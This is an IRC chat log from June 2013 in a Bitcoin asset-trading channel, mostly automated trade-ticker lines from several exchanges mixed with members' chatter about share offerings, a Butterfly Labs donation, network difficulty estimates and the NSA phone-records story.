[S.MPOE-PT] 29 @ 0.000708 = 0.0205 BTC [+] Jun 06 03:47:14 [BTCTC] [S.MPOE-PT] 171 @ 0.000708 = 0.1211 BTC [+] Jun 06 03:47:32 [HAVELOCK] [ASICM] 41 @ 0.0252 = 1.0332 BTC [-] Jun 06 03:48:28 [BTCTC] [S.MPOE-PT] 619 @ 0.00071 = 0.4395 BTC [+] Jun 06 03:48:33 [BTCTC] [S.MPOE-PT] 14 @ 0.00071 = 0.0099 BTC [+] Jun 06 03:48:35 [BTCTC] [S.MPOE-PT] 100 @ 0.00071 = 0.071 BTC [+] Jun 06 03:49:01 [MPEX] [S.MPOE] 5681 @ 0.00074215 = 4.2162 BTC [+] Jun 06 03:49:03 [MPEX] [S.MPOE] 6600 @ 0.00074234 = 4.8994 BTC [+] Jun 06 03:49:07 [BTCTC] [S.MPOE-PT] 100 @ 0.000717 = 0.0717 BTC [+] Jun 06 03:49:09 [BTCTC] [S.MPOE-PT] 737 @ 0.000718 = 0.5292 BTC [+] Jun 06 03:49:10 [BTCTC] [S.MPOE-PT] 100 @ 0.000719 = 0.0719 BTC [+] Jun 06 03:49:10 [BTCTC] [S.MPOE-PT] 1000 @ 0.00072 = 0.72 BTC [+] Jun 06 03:49:12 [BTCTC] [S.MPOE-PT] 100 @ 0.000726 = 0.0726 BTC [+] Jun 06 03:49:13 [BTCTC] [S.MPOE-PT] 10 @ 0.000727 = 0.0073 BTC [+] Jun 06 03:49:15 [BTCTC] [S.MPOE-PT] 10 @ 0.000729 = 0.0073 BTC [+] Jun 06 03:49:16 [BTCTC] [S.MPOE-PT] 500 @ 0.00073 = 0.365 BTC [+] Jun 06 03:49:17 [BTCTC] [S.MPOE-PT] 100 @ 0.000739 = 0.0739 BTC [+] Jun 06 03:50:04 [MPEX] [S.MPOE] 3000 @ 0.00074428 = 2.2328 BTC [+] Jun 06 03:50:09 [HAVELOCK] [ASICM] 43 @ 0.0252 = 1.0836 BTC [-] Jun 06 03:50:10 [HAVELOCK] [ASICM] 76 @ 0.0252 = 1.9152 BTC [-] Jun 06 03:51:44 [BTCTC] [S.MPOE-PT] 500 @ 0.00074 = 0.37 BTC [+] Jun 06 03:52:36 mircea_popescu: mg is selling right now? Jun 06 03:53:00 its done for. Jun 06 03:53:23 [HAVELOCK] [ASICM] 24 @ 0.0252 = 0.6048 BTC [-] Jun 06 03:53:33 dude holy shit Jun 06 03:53:38 wow Jun 06 03:53:38 thestringpuller yeah, closes on the 10th Jun 06 03:53:44 it's gone Jun 06 03:53:45 lol Jun 06 03:53:47 SOLD OUT Jun 06 03:54:00 gangsta Jun 06 03:54:06 a no Jun 06 03:54:21 there were ~ 13mn shares asked, got filled. max is 100mn Jun 06 03:54:31 oh right it goes to the 10th Jun 06 03:55:06 What got filled? Jun 06 03:55:15 MG Jun 06 03:55:20 S.MG Jun 06 03:55:26 [HAVELOCK] [ASICM] 95 @ 0.02521 = 2.395 BTC [+] Jun 06 03:55:35 I'm really excited about this one Jun 06 03:55:49 [BTCTC] [BITVPS] 5 @ 0.000648 = 0.0032 BTC [+] Jun 06 03:55:52 [HAVELOCK] [ASICM] 5 @ 0.02521 = 0.1261 BTC [+] Jun 06 03:56:15 [HAVELOCK] [ASICM] 19 @ 0.02521 = 0.479 BTC [+] Jun 06 03:56:25 [BTCTC] [BITVPS] 450 @ 0.000649 = 0.2921 BTC [+] Jun 06 03:56:29 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [-] Jun 06 03:56:55 [BTCTC] [S.DICE-PT] 100 @ 0.00293 = 0.293 BTC [+] Jun 06 03:56:57 [BTCTC] [BITVPS] 10 @ 0.000725 = 0.0073 BTC [+] Jun 06 03:56:59 [BTCTC] [BITVPS] 2 @ 0.000725 = 0.0015 BTC [+] Jun 06 03:57:34 [BTCTC] [BITVPS] 108 @ 0.000727 = 0.0785 BTC [+] Jun 06 03:58:21 [BTCTC] [BITVPS] 100 @ 0.000753 = 0.0753 BTC [+] Jun 06 03:58:21 [BTCTC] [CRYPTO-TRADE] 5 @ 0.18897 = 0.9449 BTC [-] Jun 06 03:59:28 [BTCTC] [BITVPS] 20 @ 0.000754 = 0.0151 BTC [+] Jun 06 03:59:55 [BTCTC] [S.MPOE-PT] 262 @ 0.00073 = 0.1913 BTC [-] Jun 06 04:00:58 [BTCTC] [ASICMINER-PT] 11 @ 2.51 = 27.61 BTC [+] Jun 06 04:01:41 [BTCTC] [BITVPS] 1 @ 0.000754 BTC [+] Jun 06 04:02:07 [BTCTC] [BITVPS] 10 @ 0.000754 = 0.0075 BTC [+] Jun 06 04:02:54 Geez, why didn't I know about that one. Jun 06 04:04:25 [BTCTC] [BITVPS] 100 @ 0.000754 = 0.0754 BTC [+] Jun 06 04:04:39 [HAVELOCK] [VTX] 1 @ 0.4249 BTC [+] Jun 06 04:05:30 [HAVELOCK] [ASICM] 4 @ 0.02519785 = 0.1008 BTC [-] Jun 06 04:08:16 [BTCTC] [BITVPS] 100 @ 0.000754 = 0.0754 BTC [+] Jun 06 04:08:35 [HAVELOCK] [ASICM] 40 @ 0.02519785 = 1.0079 BTC [-] Jun 06 04:08:52 [BTCTC] [BITVPS] 100 @ 0.000754 = 0.0754 BTC [+] Jun 06 04:09:53 [HAVELOCK] [ASICM] 2 @ 0.02519785 = 0.0504 BTC [-] Jun 06 04:10:06 Namjies prolly cause you don't read trilema ? Jun 06 04:11:34 http://bitbet.us/bet/454/btc-network-difficulty-tops-25-million-by-end/ lulzy how this reversed suddenly ~2 weeks ago Jun 06 04:12:46 [HAVELOCK] [SDICE] 1 @ 0.2343 BTC [-] Jun 06 04:13:52 [HAVELOCK] [SDICE] 4 @ 0.2344 = 0.9376 BTC [+] Jun 06 04:20:10 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [+] Jun 06 04:20:25 [HAVELOCK] [ASICM] 2 @ 0.02519785 = 0.0504 BTC [-] **** BEGIN LOGGING AT Thu Jun 6 15:11:57 2013 Jun 06 15:11:57 [BTCTC] [TAT.ASICMINER] 27 @ 0.02525 = 0.6818 BTC [-] Jun 06 15:13:13 [BTCTC] [S.MPOE-PT] 6 @ 0.000735 = 0.0044 BTC [-] Jun 06 15:13:36 [BTCTC] [TAT.ASICMINER] 17 @ 0.02525 = 0.4293 BTC [-] Jun 06 15:14:09 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [-] Jun 06 15:14:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02525 = 0.101 BTC [-] Jun 06 15:16:04 [BTCTC] [ASICMINER-PT] 1 @ 2.4997 BTC [+] Jun 06 15:16:05 [BTCTC] [ASICMINER-PT] 5 @ 2.5 = 12.5 BTC [+] Jun 06 15:17:01 [HAVELOCK] [ASICM] 12 @ 0.02499 = 0.2999 BTC [+] Jun 06 15:17:46 ;;estimate Jun 06 15:17:47 Next difficulty estimate | 20697932.0901 based on data since last change | 18920815.5142 based on data for last three days Jun 06 15:17:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.02525 BTC [-] Jun 06 15:18:02 [HAVELOCK] [SDICE] 4 @ 0.2417 = 0.9668 BTC [+] Jun 06 15:18:03 ;;bc,stats Jun 06 15:18:05 Current Blocks: 240077 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 1842 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 57 minutes, and 43 seconds | Next Difficulty Estimate: 20697932.0901 | Estimated Percent Change: 32.63116 Jun 06 15:18:29 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Jun 06 15:19:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [-] Jun 06 15:20:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.025 = 0.175 BTC [-] Jun 06 15:20:50 [BTCTC] [ASICMINER-PT] 1 @ 2.4998 BTC [-] Jun 06 15:22:50 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [+] Jun 06 15:23:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.0251 = 0.502 BTC [+] Jun 06 15:23:18 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [+] Jun 06 15:23:28 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [-] Jun 06 15:23:30 [BTCTC] [ASICMINER-PT] 3 @ 2.47111 = 7.4133 BTC [-] Jun 06 15:23:31 [BTCTC] [ASICMINER-PT] 1 @ 2.471 BTC [-] Jun 06 15:23:33 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [+] Jun 06 15:24:03 [BTCTC] [ASICMINER-PT] 2 @ 2.517 = 5.034 BTC [+] Jun 06 15:24:59 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [+] Jun 06 15:25:01 [BTCTC] [ASICMINER-PT] 1 @ 2.5179 BTC [+] Jun 06 15:25:11 [BTCTC] [TAT.ASICMINER] 34 @ 0.02526 = 0.8588 BTC [+] Jun 06 15:25:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] Jun 06 15:25:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.024872 = 0.1492 BTC [-] Jun 06 15:25:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.02487 = 0.0746 BTC [-] Jun 06 15:25:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.02486 = 0.0994 BTC [-] Jun 06 15:25:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02486 = 0.1243 BTC [-] Jun 06 15:25:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.02485 = 0.1243 BTC [-] Jun 06 15:25:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 06 15:25:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 06 15:25:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 06 15:25:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.024752 = 0.1733 BTC [-] Jun 06 15:25:59 [BTCTC] [TAT.ASICMINER] 38 @ 0.024705 = 0.9388 BTC [-] Jun 06 15:26:01 [BTCTC] [ASICMINER-PT] 1 @ 2.5179 BTC [+] Jun 06 15:26:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.024702 = 0.0494 BTC [-] Jun 06 15:26:20 [BTCTC] [TAT.ASICMINER] 12 @ 0.024701 = 0.2964 BTC [-] Jun 06 15:26:26 [BTCTC] [TAT.ASICMINER] 13 @ 0.0247 = 0.3211 BTC [-] Jun 06 15:26:37 [BTCTC] [ASICMINER-PT] 1 @ 2.515 BTC [-] Jun 06 15:26:55 [BTCTC] [CRYPTO-TRADE] 4 @ 0.185 = 0.74 BTC [-] Jun 06 15:27:36 [BTCTC] [ASICMINER-PT] 4 @ 2.51799 = 10.072 BTC [+] Jun 06 15:28:02 [BTCTC] [TAT.ASICMINER] 49 @ 0.0247 = 1.2103 BTC [-] Jun 06 15:29:34 [BTCTC] [ASICMINER-PT] 2 @ 2.516 = 5.032 BTC [-] Jun 06 15:29:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.0247 = 0.0494 BTC [-] Jun 06 15:31:18 [HAVELOCK] [ASICM] 300 @ 0.025 = 7.5 BTC [+] Jun 06 15:32:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.0247 = 0.494 BTC [-] Jun 06 15:36:27 [BTCTC] [TAT.ASICMINER] 22 @ 0.025258 = 0.5557 BTC [+] Jun 06 15:36:34 [HAVELOCK] [VTX] 27 @ 0.4249 = 11.4723 BTC [+] Jun 06 15:36:38 [HAVELOCK] [ASICM] 100 @ 0.0252 = 2.52 BTC [+] Jun 06 15:36:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.025258 = 0.1515 BTC [+] Jun 06 15:37:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.025258 = 0.2778 BTC [+] Jun 06 15:37:25 [HAVELOCK] [ASICM] 283 @ 0.025212 = 7.135 BTC [+] Jun 06 15:37:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.025258 = 0.1263 BTC [+] Jun 06 15:38:31 [HAVELOCK] [SDICE] 10 @ 0.2431 = 2.431 BTC [+] Jun 06 15:39:01 [HAVELOCK] [SDICE] 22 @ 0.2447 = 5.3834 BTC [+] Jun 06 15:39:02 [HAVELOCK] [SDICE] 5 @ 0.2447 = 1.2235 BTC [+] Jun 06 15:40:27 [HAVELOCK] [ASICM] 420 @ 0.02538 = 10.6596 BTC [+] Jun 06 15:42:15 [MPEX] [S.MPOE] 2350 @ 0.00074762 = 1.7569 BTC [+] Jun 06 15:42:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.025258 = 0.1263 BTC [+] Jun 06 15:44:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.025259 = 0.0758 BTC [+] Jun 06 15:46:23 deposits processed ftr. Jun 06 15:47:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [-] Jun 06 15:47:37 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Jun 06 15:47:39 [BTCTC] [ASICMINER-PT] 5 @ 2.5 = 12.5 BTC [+] Jun 06 15:47:50 [BTCTC] [TAT.ASICMINER] 8 @ 0.025259 = 0.2021 BTC [+] Jun 06 15:47:55 mp, did you see the BFL news about donating? Jun 06 15:48:40 [BTCTC] [TAT.ASICMINER] 9 @ 0.025259 = 0.2273 BTC [+] Jun 06 15:49:04 nope Jun 06 15:49:23 kinda took em off the watch list tbh Jun 06 15:49:47 I'd be curious to see that list. :) Jun 06 15:50:17 [09:35] BFL donation https://forums.butterflylabs.com/content/134-butterfly-labs-donates-1000-btc-charity-bitcoin-related-projects.html Jun 06 15:50:17 [09:36] their donation is to a fund they founded themselves, that makes donations to bitcoin related efforts Jun 06 15:50:55 so basically that 1000btc bet Jun 06 15:50:59 they paid to themselves Jun 06 15:51:06 Tom_Servo :) Jun 06 15:51:09 and then guess who they donated to first Jun 06 15:51:23 ThickAsThieves why am i so very unsurprised. Jun 06 15:51:28 Luke-Jr Jun 06 15:51:31 lol Jun 06 15:51:36 hahahah Jun 06 15:51:42 pretty awesome huh? Jun 06 15:51:48 bflsome. Jun 06 15:52:12 they also gave to cgminer and the EFF Jun 06 15:52:24 100 and 50 bux respectively ? Jun 06 15:52:25 [BTCTC] [S.DICE-PT] 2 @ 0.0028 = 0.0056 BTC [-] Jun 06 15:52:26 EFF being the people that "do not upport bitcoin" Jun 06 15:52:30 support* Jun 06 15:52:36 but they'll gladly accept them Jun 06 15:53:21 yeah. people need to start learning where the sharpies go. Jun 06 15:53:27 we're the rich kids, we make the rules. Jun 06 15:53:54 [BTCTC] [TAT.ASICMINER] 11 @ 0.025258 = 0.2778 BTC [-] Jun 06 16:01:16 [HAVELOCK] [HIM] 6 @ 0.3 = 1.8 BTC [+] Jun 06 16:01:31 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Jun 06 16:02:42 [HAVELOCK] [ASICM] 9 @ 0.02538 = 0.2284 BTC [+] Jun 06 16:04:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.025256 = 0.3788 BTC [-] Jun 06 16:04:46 [BTCTC] [TAT.ASICMINER] 60 @ 0.025257 = 1.5154 BTC [+] Jun 06 16:04:48 [BTCTC] [TAT.ASICMINER] 24 @ 0.025258 = 0.6062 BTC [+] Jun 06 16:04:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.025259 BTC [+] Jun 06 16:05:21 [BTCTC] [TAT.ASICMINER] 8 @ 0.025259 = 0.2021 BTC [+] Jun 06 16:05:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.025259 = 0.3789 BTC [+] Jun 06 16:11:21 [HAVELOCK] [ASICM] 6 @ 0.02538 = 0.1523 BTC [+] Jun 06 16:11:21 [BTCTC] [S.DICE-PT] 25 @ 0.0028 = 0.07 BTC [-] Jun 06 16:11:46 [HAVELOCK] [ASICM] 7 @ 0.02537 = 0.1776 BTC [-] Jun 06 16:12:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] Jun 06 16:12:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.0252 = 0.1512 BTC [-] Jun 06 16:16:55 [MPEX] [S.MPOE] 11750 @ 0.00074325 = 8.7332 BTC [-] Jun 06 16:17:04 [BTCTC] [PAJKA.BOND] 1 @ 0.099001 BTC [-] Jun 06 16:17:07 [BTCTC] [PAJKA.BOND] 2 @ 0.099 = 0.198 BTC [-] Jun 06 16:18:20 [BTCTC] [PAJKA.BOND] 2 @ 0.1 = 0.2 BTC [+] Jun 06 16:19:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.0252 = 0.0504 BTC [-] Jun 06 16:20:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.0252 = 0.252 BTC [-] Jun 06 16:21:29 zebedee_ ahh had no idea they had a search, i fail at gambling Jun 06 16:21:49 Chaaaang-Noi!*@* added to ignore list. Jun 06 16:24:03 [BTCTC] [PAJKA.BOND] 1 @ 0.099999 BTC [-] Jun 06 16:25:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.0252 = 0.2268 BTC [-] Jun 06 16:25:56 [HAVELOCK] [ASICM] 46 @ 0.02537 = 1.167 BTC [-] Jun 06 16:26:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] Jun 06 16:27:36 [HAVELOCK] [HIM] 1 @ 0.3 BTC [+] Jun 06 16:28:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.0252 = 0.1512 BTC [-] Jun 06 16:29:34 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Jun 06 16:30:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] Jun 06 16:30:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 06 16:30:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 06 16:30:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 06 16:30:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.024706 = 0.3706 BTC [-] Jun 06 16:31:15 [BTCTC] [TAT.ASICMINER] 24 @ 0.024705 = 0.5929 BTC [-] Jun 06 16:31:26 [HAVELOCK] [HIM] 20 @ 0.3 = 6 BTC [+] Jun 06 16:31:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.0252 = 0.126 BTC [+] Jun 06 16:32:43 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [-] Jun 06 16:38:01 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [+] Jun 06 16:38:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.0251 = 0.2008 BTC [-] Jun 06 16:39:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0252 = 0.126 BTC [+] Jun 06 16:39:50 [BTCTC] [RSM] 1 @ 0.008544 BTC [+] Jun 06 16:42:25 [HAVELOCK] [HIM] 1 @ 0.3 BTC [+] Jun 06 16:45:17 [BTCTC] [TAT.ASICMINER] 7 @ 0.02517 = 0.1762 BTC [-] Jun 06 16:47:31 [BTCTC] [TAT.ASICMINER] 38 @ 0.025165 = 0.9563 BTC [-] Jun 06 16:47:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02517 BTC [+] Jun 06 16:54:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.0251 = 0.251 BTC [-] Jun 06 16:57:23 [HAVELOCK] [ASICM] 47 @ 0.02534 = 1.191 BTC [-] Jun 06 16:57:42 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 16:58:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.0251 = 0.0753 BTC [-] Jun 06 16:58:55 [HAVELOCK] [ASICM] 1 @ 0.02534 BTC [-] Jun 06 17:00:34 [HAVELOCK] [TESTING] [PAID] 0.03 BTC to 10`000 shares, 300 satoshi per share Jun 06 17:00:49 excellent Jun 06 17:00:50 how do i buy this TESTING? Jun 06 17:00:52 dividends will now announce Jun 06 17:00:54 xD Jun 06 17:00:56 heh Jun 06 17:01:42 lol Jun 06 17:02:40 [BTCTC] [ASICMINER-PT] 3 @ 2.489 = 7.467 BTC [-] Jun 06 17:02:57 TESTING is the new show in town, you didnt hear? Jun 06 17:03:20 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [+] Jun 06 17:03:26 [BTCTC] [ASICMINER-PT] 1 @ 2.4989 BTC [+] Jun 06 17:03:43 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 06 17:03:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [-] Jun 06 17:04:30 [BTCTC] [B.YABMC] 4 @ 0.016 = 0.064 BTC [-] Jun 06 17:04:42 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [+] Jun 06 17:04:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4995 BTC [+] Jun 06 17:04:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4996 BTC [+] Jun 06 17:04:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4997 BTC [+] Jun 06 17:04:54 [BTCTC] [ASICMINER-PT] 1 @ 2.4998 BTC [+] Jun 06 17:04:57 TAT.TESTING first dividend has been paid out successfully. Thanks all for a great IPO! Jun 06 17:05:03 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 06 17:05:16 scam. Jun 06 17:07:07 [BTCTC] [PAJKA.BOND] 3 @ 0.1 = 0.3 BTC [+] Jun 06 17:07:22 [HAVELOCK] [ASICM] 78 @ 0.0253 = 1.9734 BTC [+] Jun 06 17:13:58 [BTCTC] [BASIC-MINING] 1 @ 0.7098 BTC [-] Jun 06 17:14:09 [BTCTC] [BASIC-MINING] 7 @ 0.7099 = 4.9693 BTC [+] Jun 06 17:16:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.02509 = 0.1004 BTC [-] Jun 06 17:17:16 http://www.guardian.co.uk/world/2013/jun/06/nsa-phone-records-verizon-court-order Jun 06 17:17:35 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18 BTC [-] Jun 06 17:17:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.178 BTC [-] Jun 06 17:17:42 [BTCTC] [CRYPTO-TRADE] 10 @ 0.17731 = 1.7731 BTC [-] Jun 06 17:17:43 [BTCTC] [CRYPTO-TRADE] 38 @ 0.1773 = 6.7374 BTC [-] Jun 06 17:18:25 [HAVELOCK] [SDICE] 5 @ 0.2417 = 1.2085 BTC [-] Jun 06 17:18:30 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [-] Jun 06 17:19:19 maybe so, but this does mean other people may learn too Jun 06 17:19:25 [HAVELOCK] [ASICM] 48 @ 0.0253 = 1.2144 BTC [+] Jun 06 17:19:35 i'm not sure anything could be done about it Jun 06 17:19:43 but people need to wise up Jun 06 17:20:39 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [-] Jun 06 17:20:41 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Jun 06 17:23:08 [BTCTC] [ESECURITYSABTC] 1 @ 0.23202 BTC [-] Jun 06 17:25:37 Hash me harder Jun 06 17:28:15 "The order does not apply to the content of the communications." Jun 06 17:28:52 Whoever populated correct horse battery staple with loads of dust has a lot to answer for. Jun 06 17:30:49 [MPEX] [S.MPOE] 4150 @ 0.00074325 = 3.0845 BTC [-] Jun 06 17:30:51 [MPEX] [S.MPOE] 336 @ 0.00074255 = 0.2495 BTC [-] Jun 06 17:31:03 [MPEX] [S.MPOE] 1114 @ 0.0007415 = 0.826 BTC [-] Jun 06 17:32:09 [HAVELOCK] [ASICM] 140 @ 0.0253 = 3.542 BTC [+] Jun 06 17:32:37 we all know zebedee_'s passphrase now Jun 06 17:33:22 Chaaaang-Noi: That fscking public address has thousands of 25-satoshi deposits that every sad idiot keeps trying to transfer, and failing. And the txns keep getting rebroadcast. Jun 06 17:34:11 <+AssetBot> [CoinBr.iDiff-O] 200 @ 0.26000000 = 52.00000000 [+] Jun 06 17:34:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.02509 = 0.0502 BTC [-] Jun 06 17:35:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.02509 = 0.0753 BTC [-] Jun 06 17:35:15 yea i got the notification. just 2 hours ago i offered them at 0.225 Jun 06 17:35:49 Yeah it's used as an example in one or two places so its private key is well known Jun 06 17:35:58 Perhaps it's the example on bitaddress.org Jun 06 17:36:04 [BTCTC] [TAT.ASICMINER] 42 @ 0.02509 = 1.0538 BTC [-] **** BEGIN LOGGING AT Thu Jun 6 17:40:44 2013 Jun 06 17:42:00 [BTCTC] [ASICMINER-PT] 2 @ 2.489 = 4.978 BTC [-] Jun 06 17:42:41 [HAVELOCK] [ASICM] 13 @ 0.0253 = 0.3289 BTC [+] Jun 06 17:43:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.02509 = 1.2545 BTC [-] Jun 06 17:44:07 [BTCTC] [ASICMINER-PT] 1 @ 2.49879 BTC [+] Jun 06 17:44:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [-] Jun 06 17:45:17 [BTCTC] [TAT.ASICMINER] 60 @ 0.02509 = 1.5054 BTC [-] Jun 06 17:45:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02509 = 0.0753 BTC [-] Jun 06 17:45:38 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 17:45:59 [BTCTC] [BTC-BOND] 2 @ 0.009997 = 0.02 BTC [-] Jun 06 17:46:03 [BTCTC] [ASICMINER-PT] 1 @ 2.49879 BTC [+] Jun 06 17:46:50 ;;bc,stats Jun 06 17:46:52 Current Blocks: 240092 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 1827 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 18 minutes, and 15 seconds | Next Difficulty Estimate: 20265691.9409 | Estimated Percent Change: 29.86139 Jun 06 17:47:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.02509 = 0.0502 BTC [-] Jun 06 17:49:40 [HAVELOCK] [VTX] 5 @ 0.425 = 2.125 BTC [+] Jun 06 17:49:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.02509 = 0.1505 BTC [-] Jun 06 17:51:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [-] Jun 06 17:52:19 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [-] Jun 06 17:54:24 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [+] Jun 06 17:57:02 [BTCTC] [TAT.ASICMINER] 15 @ 0.02509 = 0.3764 BTC [-] Jun 06 17:57:45 [HAVELOCK] [HIM] 10 @ 0.3 = 3 BTC [+] Jun 06 17:57:57 [MPEX] [S.MPOE] 5890 @ 0.0007415 = 4.3674 BTC [-] Jun 06 17:57:58 [MPEX] [S.MPOE] 10100 @ 0.00073908 = 7.4647 BTC [-] Jun 06 17:58:01 [MPEX] [S.MPOE] 2614 @ 0.00073886 = 1.9314 BTC [-] Jun 06 17:58:31 [HAVELOCK] [ASICM] 90 @ 0.0253 = 2.277 BTC [+] Jun 06 17:59:09 [BTCTC] [ASICMINER-PT] 3 @ 2.4939 = 7.4817 BTC [-] Jun 06 17:59:28 [BTCTC] [ASICMINER-PT] 8 @ 2.4939 = 19.9512 BTC [-] Jun 06 18:00:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [-] Jun 06 18:03:25 [HAVELOCK] [SDICE] 9 @ 0.2417 = 2.1753 BTC [-] Jun 06 18:04:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [-] Jun 06 18:05:18 ;;next Jun 06 18:05:19 target for downward continuation: 110 | resistance: 121.75, 122-122.5, 124 | support: 117, 115, 102-105 | #bitcoin [Wed, 05 Jun 2013 03:59:59 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 day, 11 hours, 5 minutes, and 19 seconds ago Jun 06 18:06:29 [BTCTC] [S.DICE-PT] 6 @ 0.002503 = 0.015 BTC [-] Jun 06 18:10:32 [HAVELOCK] [HIM] 4 @ 0.3 = 1.2 BTC [+] Jun 06 18:12:37 [BTCTC] [ASICMINER-PT] 2 @ 2.487 = 4.974 BTC [-] Jun 06 18:14:02 [BTCTC] [ASICMINER-PT] 1 @ 2.493 BTC [+] Jun 06 18:16:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.02509 = 0.0753 BTC [-] Jun 06 18:20:08 [BTCTC] [BITVPS] 100 @ 0.000751 = 0.0751 BTC [-] Jun 06 18:24:46 http://sanfrancisco.cbslocal.com/2013/06/06/atherton-revolts-over-cost-of-obama-visit-targets-donors/ Jun 06 18:26:43 he made 3 million usd... i think he will be fine paying the 8,000 Jun 06 18:27:01 Chaaaang-Noi!*@* added to ignore list. Jun 06 18:32:01 [BTCTC] [TAT.ASICMINER] 55 @ 0.024901 = 1.3696 BTC [-] Jun 06 18:32:35 [BTCTC] [ASICMINER-PT] 1 @ 2.4928 BTC [-] Jun 06 18:34:37 [HAVELOCK] [ASICM] 2 @ 0.0252 = 0.0504 BTC [-] Jun 06 18:35:39 ASICMINER UPDATE: "The wafer of the first half (100TH/s) of next batch is to be out of fab. Jun 06 18:35:39 More than 4,000 USB devices are sold out in total. The demand of blades are surprisingly long-lasting and still high." Jun 06 18:36:27 certainly has a point there. Jun 06 18:37:41 He also took the time to give Furuknap a less than indirect STFU: Jun 06 18:37:46 "With respect to the 